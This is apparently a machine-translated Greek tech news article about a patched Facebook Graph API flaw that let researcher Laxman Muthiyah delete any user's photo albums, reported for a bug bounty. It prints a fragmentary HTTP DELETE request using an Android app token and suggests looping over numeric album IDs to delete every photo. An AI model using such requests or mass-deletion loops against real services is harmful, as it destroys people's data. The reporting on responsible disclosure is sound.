How a hacker could delete every Facebook photo

Facebook probably has the biggest one data from photographs. About 350 million photos are uploaded from around the world every day.delete button Facebook

The security researcher Laxman Muthiyah he discovered a way that he could if he wished to delete every photo that has gone up to the popular social network.

Fortunately for it Facebook and 1,3 billion users, researcher Laxman Muthiyah had no malicious aspirations. He reported the error on Facebook, and won 12500 dollars.

The response from Facebook was immediate - to their credit, and the error was fixed across the network within 2 hours.

Laxman says:

OMG: D the album got deleted! So i got the key to delete all of your Facebook photos: P lol: D
Immediately reported this bug to Facebook team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgment of the report.

Of course, Laxman had other options.

The error he discovered is a weapon. He could not kill anyone, but he could make miserable hundreds of millions of people.

Laxman would probably have put the bug in the underground market and earned a lot more money than he got from Facebok.

Or he could keep his discovery a secret and exploit it for his own benefit, see LizardSquad. Do you think if LizardSquad had discovered the vulnerability they would have reported it on Facebook?

Laxman discovered the error while looking at the API's Graph API (Application Program Interface).

The Graph API helps connect Facebook with websites, apps, and morethose that need to integrate with Facebook.

He is a frugal, interface directed by HTTP requests. It allows apps to do the same things Facebook users do, and more.

Of course, API users should not be able to process or delete things belonging to someone else.

What Laxman discovered was a bug that allowed him to do just that, using an access token of the Facebook app for Android to authenticate himself.

Facebook's vulnerability was nothing more than four lines of code:

DELETE / HTTP / 1.1
Host: graph.facebook.com
Content-Length: 245
access_token=attacker's Facebook for Android token>

Facebok's album IDs are numeric, which means that someone can start from 1 and just keep going until nothing is left. Or even faster, the hacker could create a script with the above code in a loop, starting from 1 up to one trillion.

Guess the result.

See PoC

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.087 registrants.

accessFacebookhackerLaxman Muthiyahyoutube

Written by giorgos

George still wonders what he's doing here ...

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).